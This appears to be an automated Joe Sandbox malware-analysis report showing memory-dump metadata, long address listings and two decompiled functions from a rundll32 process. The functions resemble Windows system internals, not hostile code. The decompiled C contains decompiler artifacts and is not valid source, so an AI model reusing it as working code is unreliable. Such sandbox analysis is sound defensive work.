                                                                                                                0x04476eed
                                                                                                                0x04476ef0
                                                                                                                0x04476ef4
                                                                                                                0x04476ef8
                                                                                                                0x04476efc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04476f0d
                                                                                                                0x04476f11
                                                                                                                0x04476f32
                                                                                                                0x04476f37
                                                                                                                0x04476f3b
                                                                                                                0x04476f3e
                                                                                                                0x04476f41
                                                                                                                0x04476f46
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04476f4c
                                                                                                                0x04476f50
                                                                                                                0x04476f50
                                                                                                                0x04476f54
                                                                                                                0x04476f62
                                                                                                                0x04476f65
                                                                                                                0x04476f6d
                                                                                                                0x04476f7b
                                                                                                                0x04476f7b
                                                                                                                0x04476f93
                                                                                                                0x04476f98
                                                                                                                0x04476fa0
                                                                                                                0x04476fa6
                                                                                                                0x04476fb3
                                                                                                                0x04476fb6
                                                                                                                0x04476fbf
                                                                                                                0x04476fc1
                                                                                                                0x04476fd5
                                                                                                                0x04476fda
                                                                                                                0x04476fda
                                                                                                                0x04476fdd
                                                                                                                0x04476fe2
                                                                                                                0x04476fe7
                                                                                                                0x04476feb
                                                                                                                0x04476fef
                                                                                                                0x04476ff3
                                                                                                                0x0443520c
                                                                                                                0x0443520c
                                                                                                                0x0443520f
                                                                                                                0x04435215
                                                                                                                0x04435234
                                                                                                                0x0443523a
                                                                                                                0x0443523a
                                                                                                                0x04435244
                                                                                                                0x04435245
                                                                                                                0x04435246
                                                                                                                0x04435251
                                                                                                                0x04435251
                                                                                                                0x04476f13
                                                                                                                0x04476f17
                                                                                                                0x04476f17
                                                                                                                0x04476f18
                                                                                                                0x04476f1b
                                                                                                                0x04476f1f
                                                                                                                0x04476f23
                                                                                                                0x00000000
                                                                                                                0x04476f28
                                                                                                                0x04435204
                                                                                                                0x04435204
                                                                                                                0x04435208
                                                                                                                0x00000000
                                                                                                                0x04435208
                                                                                                                0x04435185
                                                                                                                0x04435188
                                                                                                                0x0443518a
                                                                                                                0x0443518e
                                                                                                                0x04435195
                                                                                                                0x04476db1
                                                                                                                0x04476db5
                                                                                                                0x04476db9
                                                                                                                0x0443519b
                                                                                                                0x0443519b
                                                                                                                0x0443519e
                                                                                                                0x044351a7
                                                                                                                0x044351a9
                                                                                                                0x044351a9
                                                                                                                0x044351b5
                                                                                                                0x044351b8
                                                                                                                0x044351bb
                                                                                                                0x044351be
                                                                                                                0x044351c1
                                                                                                                0x044351c5
                                                                                                                0x044351c9
                                                                                                                0x044351cd
                                                                                                                0x044351cd
                                                                                                                0x044351d8
                                                                                                                0x044351dc
                                                                                                                0x044351e0
                                                                                                                0x04476dcc
                                                                                                                0x04476dd0
                                                                                                                0x04476dd5
                                                                                                                0x04476ddd
                                                                                                                0x04476de1
                                                                                                                0x04476de1
                                                                                                                0x04476de5
                                                                                                                0x04476deb
                                                                                                                0x04476df1
                                                                                                                0x04476df7
                                                                                                                0x04476dfd
                                                                                                                0x04476e01
                                                                                                                0x04476e05
                                                                                                                0x04476e09
                                                                                                                0x04476e0d
                                                                                                                0x04476e11
                                                                                                                0x04476e11
                                                                                                                0x044351eb
                                                                                                                0x04476e1a
                                                                                                                0x04476e1f
                                                                                                                0x04476e21
                                                                                                                0x04476e23
                                                                                                                0x00000000
                                                                                                                0x044351f1
                                                                                                                0x044351f1
                                                                                                                0x00000000
                                                                                                                0x044351f1

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 59af073d506f525952581da443db18c446b1fcb201271b6ef30d83859ade5c08
                                                                                                                • Instruction ID: 03cdef8b5c3d331bb03e5751b030c8d4467fef7c01276a416dc88b8f2a312b5a
                                                                                                                • Opcode Fuzzy Hash: 59af073d506f525952581da443db18c446b1fcb201271b6ef30d83859ade5c08
                                                                                                                • Instruction Fuzzy Hash: FFC132756087809FD754CF28C580A5AFBE1BF88318F148A6EF8998B352D770E846CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044303E2 Relevance: .3, Instructions: 254COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E044303E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x44fd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04430548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0444B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0441B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x44f7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04427D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04427D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04487016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04449830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E044869A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x44f7c04 != 0) {
						_t118 = _v12;
						_t120 = E0448A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x44f7bd8;
						if( *0x44f7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E044495D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E044499A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04483540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0440B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0444AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x44f8474 - 3;
										if( *0x44f8474 != 3) {
											 *0x44f79dc =  *0x44f79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04427D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04427D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04487016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x44f8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x44f7b00; // 0x0
							asm("ror esi, cl");
							 *0x44fb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E044495D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04417F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                                0x044303f1
                                                                                                                0x044303f7
                                                                                                                0x044303f9
                                                                                                                0x044303fb
                                                                                                                0x044303fd
                                                                                                                0x04430400
                                                                                                                0x0443040a
                                                                                                                0x04474c7a
                                                                                                                0x04430537
                                                                                                                0x04430547
                                                                                                                0x04430410
                                                                                                                0x04430410
                                                                                                                0x04430414
                                                                                                                0x04430417
                                                                                                                0x0443041a
                                                                                                                0x04430421
                                                                                                                0x04430424
                                                                                                                0x0443042b
                                                                                                                0x0443043b
                                                                                                                0x0443043e
                                                                                                                0x0443043f
                                                                                                                0x0443043f
                                                                                                                0x04430446
                                                                                                                0x04430449
                                                                                                                0x0443044c
                                                                                                                0x0443044f
                                                                                                                0x04430459
                                                                                                                0x04474c8d
                                                                                                                0x0443045f
                                                                                                                0x0443045f
                                                                                                                0x0443045f
                                                                                                                0x04430467
                                                                                                                0x04474c97
                                                                                                                0x04474c9d
                                                                                                                0x04474ca4
                                                                                                                0x04474caa
                                                                                                                0x04474caf
                                                                                                                0x04474cb1
                                                                                                                0x04474cc3
                                                                                                                0x04474cb3
                                                                                                                0x04474cbc
                                                                                                                0x04474cbc
                                                                                                                0x04474cc8
                                                                                                                0x04474ccb
                                                                                                                0x04474cd7
                                                                                                                0x04474cda
                                                                                                                0x04474cdf
                                                                                                                0x04474cdf
                                                                                                                0x04474ccb
                                                                                                                0x04474ca4
                                                                                                                0x0443046d
                                                                                                                0x0443046f
                                                                                                                0x0443046f
                                                                                                                0x04430471
                                                                                                                0x04430476
                                                                                                                0x0443047a
                                                                                                                0x0443047b
                                                                                                                0x04430483
                                                                                                                0x04430489
                                                                                                                0x0443048d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474ce9
                                                                                                                0x04474cef
                                                                                                                0x04474d22
                                                                                                                0x04474d22
                                                                                                                0x00000000
                                                                                                                0x04474d22
                                                                                                                0x04474cf1
                                                                                                                0x04474cf7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474cf9
                                                                                                                0x04474cff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474d05
                                                                                                                0x04474d07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474d0d
                                                                                                                0x04474d0f
                                                                                                                0x04474d14
                                                                                                                0x04474d16
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474d1c
                                                                                                                0x04474d1c
                                                                                                                0x04430499
                                                                                                                0x04430535
                                                                                                                0x04430535
                                                                                                                0x00000000
                                                                                                                0x04430535
                                                                                                                0x044304a6
                                                                                                                0x04474d2c
                                                                                                                0x04474d37
                                                                                                                0x04474d39
                                                                                                                0x04474d3b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474d41
                                                                                                                0x04474d48
                                                                                                                0x04430527
                                                                                                                0x0443052b
                                                                                                                0x0443052d
                                                                                                                0x04430530
                                                                                                                0x04430530
                                                                                                                0x00000000
                                                                                                                0x0443052b
                                                                                                                0x04474d4e
                                                                                                                0x044304ac
                                                                                                                0x044304ac
                                                                                                                0x044304af
                                                                                                                0x044304b2
                                                                                                                0x044304b7
                                                                                                                0x044304b9
                                                                                                                0x044304bb
                                                                                                                0x044304bd
                                                                                                                0x044304bf
                                                                                                                0x044304c5
                                                                                                                0x044304c9
                                                                                                                0x04474d53
                                                                                                                0x04474d59
                                                                                                                0x04474db9
                                                                                                                0x04474dba
                                                                                                                0x04474dbf
                                                                                                                0x04474dc2
                                                                                                                0x04474dc4
                                                                                                                0x04474dc7
                                                                                                                0x04474dce
                                                                                                                0x00000000
                                                                                                                0x04474dce
                                                                                                                0x04474d5b
                                                                                                                0x04474d61
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474d63
                                                                                                                0x04474d69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474d6b
                                                                                                                0x04474d6e
                                                                                                                0x04474d74
                                                                                                                0x04474d76
                                                                                                                0x04474d7c
                                                                                                                0x04474d7e
                                                                                                                0x04474d84
                                                                                                                0x04474d89
                                                                                                                0x04474d8c
                                                                                                                0x04474d8d
                                                                                                                0x04474d92
                                                                                                                0x04474d95
                                                                                                                0x04474d96
                                                                                                                0x04474d98
                                                                                                                0x04474d9a
                                                                                                                0x04474d9f
                                                                                                                0x04474da4
                                                                                                                0x04474da6
                                                                                                                0x04474da8
                                                                                                                0x04474daf
                                                                                                                0x04474db1
                                                                                                                0x04474db1
                                                                                                                0x04474daf
                                                                                                                0x04474da6
                                                                                                                0x04474d84
                                                                                                                0x04474d7c
                                                                                                                0x00000000
                                                                                                                0x04474d74
                                                                                                                0x044304d6
                                                                                                                0x04474de1
                                                                                                                0x044304dc
                                                                                                                0x044304dc
                                                                                                                0x044304dc
                                                                                                                0x044304e4
                                                                                                                0x04474deb
                                                                                                                0x04474df1
                                                                                                                0x04474df8
                                                                                                                0x04474dfe
                                                                                                                0x04474e03
                                                                                                                0x04474e05
                                                                                                                0x04474e17
                                                                                                                0x04474e07
                                                                                                                0x04474e10
                                                                                                                0x04474e10
                                                                                                                0x04474e1c
                                                                                                                0x04474e1f
                                                                                                                0x04474e35
                                                                                                                0x04474e35
                                                                                                                0x04474e1f
                                                                                                                0x04474df8
                                                                                                                0x044304f1
                                                                                                                0x044304fa
                                                                                                                0x04474e3f
                                                                                                                0x04474e47
                                                                                                                0x04474e5b
                                                                                                                0x04474e61
                                                                                                                0x04474e67
                                                                                                                0x04474e69
                                                                                                                0x04474e71
                                                                                                                0x04474e73
                                                                                                                0x04430500
                                                                                                                0x04430500
                                                                                                                0x04430500
                                                                                                                0x044304fa
                                                                                                                0x04430508
                                                                                                                0x0443051d
                                                                                                                0x0443051d
                                                                                                                0x0443051f
                                                                                                                0x04430524
                                                                                                                0x00000000
                                                                                                                0x04430524
                                                                                                                0x04430515
                                                                                                                0x04430517
                                                                                                                0x04474e7a
                                                                                                                0x04474e7c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04474e85
                                                                                                                0x00000000
                                                                                                                0x04474e85
                                                                                                                0x00000000
                                                                                                                0x04430517

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e2cdf0bbcaa32f716f53335b77060d4b1e7ddf2623b8f698a9ce22fee33a9bb
                                                                                                                • Instruction ID: cc9724e0b1539b76dd4b125787192aaa027336cb8a2480b4bd649d67f1e2c0d2
                                                                                                                • Opcode Fuzzy Hash: 0e2cdf0bbcaa32f716f53335b77060d4b1e7ddf2623b8f698a9ce22fee33a9bb
                                                                                                                • Instruction Fuzzy Hash: 39910231E00254AFFF319A69C844BBE7BA4EB05B29F054367E950AB2D2E774BD41C781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440C600 Relevance: .2, Instructions: 225COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E0440C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x44fd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04416D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0444B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x44f7b9c; // 0x0
					_t74 = L04424620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04449650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L044277F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0444F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E044413C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L044277F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04449650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                                                0x0440c608
                                                                                                                0x0440c615
                                                                                                                0x0440c625
                                                                                                                0x0440c62d
                                                                                                                0x0440c635
                                                                                                                0x0440c640
                                                                                                                0x0440c680
                                                                                                                0x0440c687
                                                                                                                0x0440c688
                                                                                                                0x0440c689
                                                                                                                0x0440c694
                                                                                                                0x0440c694
                                                                                                                0x0440c642
                                                                                                                0x0440c64a
                                                                                                                0x0440c697
                                                                                                                0x04477a25
                                                                                                                0x04477a2b
                                                                                                                0x04477a2e
                                                                                                                0x04477a30
                                                                                                                0x04477bea
                                                                                                                0x04477bea
                                                                                                                0x00000000
                                                                                                                0x04477bea
                                                                                                                0x04477a36
                                                                                                                0x04477a43
                                                                                                                0x04477a48
                                                                                                                0x04477a4c
                                                                                                                0x04477a4e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477a58
                                                                                                                0x04477a5a
                                                                                                                0x04477a5b
                                                                                                                0x04477a5c
                                                                                                                0x04477a5d
                                                                                                                0x04477a63
                                                                                                                0x04477a64
                                                                                                                0x04477a6a
                                                                                                                0x04477a6c
                                                                                                                0x04477a6e
                                                                                                                0x044779cb
                                                                                                                0x044779cb
                                                                                                                0x044779ce
                                                                                                                0x044779d0
                                                                                                                0x04477a98
                                                                                                                0x04477a9b
                                                                                                                0x04477a9b
                                                                                                                0x04477a9e
                                                                                                                0x04477aa1
                                                                                                                0x04477bbe
                                                                                                                0x04477bbe
                                                                                                                0x04477bc0
                                                                                                                0x04477be0
                                                                                                                0x04477be0
                                                                                                                0x04477a01
                                                                                                                0x04477a01
                                                                                                                0x04477a05
                                                                                                                0x04477a07
                                                                                                                0x04477a15
                                                                                                                0x04477a15
                                                                                                                0x04477a1a
                                                                                                                0x00000000
                                                                                                                0x04477a1a
                                                                                                                0x04477bc2
                                                                                                                0x04477bc6
                                                                                                                0x04477bc9
                                                                                                                0x04477bcd
                                                                                                                0x04477bcf
                                                                                                                0x044779e6
                                                                                                                0x044779e6
                                                                                                                0x044779eb
                                                                                                                0x044779eb
                                                                                                                0x044779ef
                                                                                                                0x044779f1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044779f3
                                                                                                                0x044779f5
                                                                                                                0x044779ff
                                                                                                                0x044779ff
                                                                                                                0x00000000
                                                                                                                0x044779ff
                                                                                                                0x044779f7
                                                                                                                0x044779fd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044779fd
                                                                                                                0x04477bd5
                                                                                                                0x04477bd8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477ba9
                                                                                                                0x04477bac
                                                                                                                0x04477bb0
                                                                                                                0x04477bb1
                                                                                                                0x04477bb1
                                                                                                                0x04477bb6
                                                                                                                0x00000000
                                                                                                                0x04477bb6
                                                                                                                0x04477aa7
                                                                                                                0x04477aaa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477ab2
                                                                                                                0x04477ab3
                                                                                                                0x04477ab5
                                                                                                                0x04477aec
                                                                                                                0x04477aef
                                                                                                                0x04477b25
                                                                                                                0x04477b28
                                                                                                                0x04477b62
                                                                                                                0x04477b64
                                                                                                                0x04477b8f
                                                                                                                0x04477b92
                                                                                                                0x04477b96
                                                                                                                0x04477b98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477b9e
                                                                                                                0x04477b9f
                                                                                                                0x04477ba3
                                                                                                                0x00000000
                                                                                                                0x04477ba3
                                                                                                                0x04477b66
                                                                                                                0x04477b68
                                                                                                                0x04477ae2
                                                                                                                0x04477ae2
                                                                                                                0x00000000
                                                                                                                0x04477ae2
                                                                                                                0x04477b6e
                                                                                                                0x04477b72
                                                                                                                0x04477b75
                                                                                                                0x04477b81
                                                                                                                0x04477b85
                                                                                                                0x04477b87
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477b31
                                                                                                                0x04477b34
                                                                                                                0x04477b3c
                                                                                                                0x04477b45
                                                                                                                0x04477b46
                                                                                                                0x04477b4f
                                                                                                                0x04477b51
                                                                                                                0x04477b57
                                                                                                                0x04477b59
                                                                                                                0x04477b59
                                                                                                                0x00000000
                                                                                                                0x04477b59
                                                                                                                0x04477b77
                                                                                                                0x00000000
                                                                                                                0x04477b77
                                                                                                                0x04477b2a
                                                                                                                0x00000000
                                                                                                                0x04477b2a
                                                                                                                0x04477af1
                                                                                                                0x04477af3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477afb
                                                                                                                0x04477afc
                                                                                                                0x04477afe
                                                                                                                0x00000000
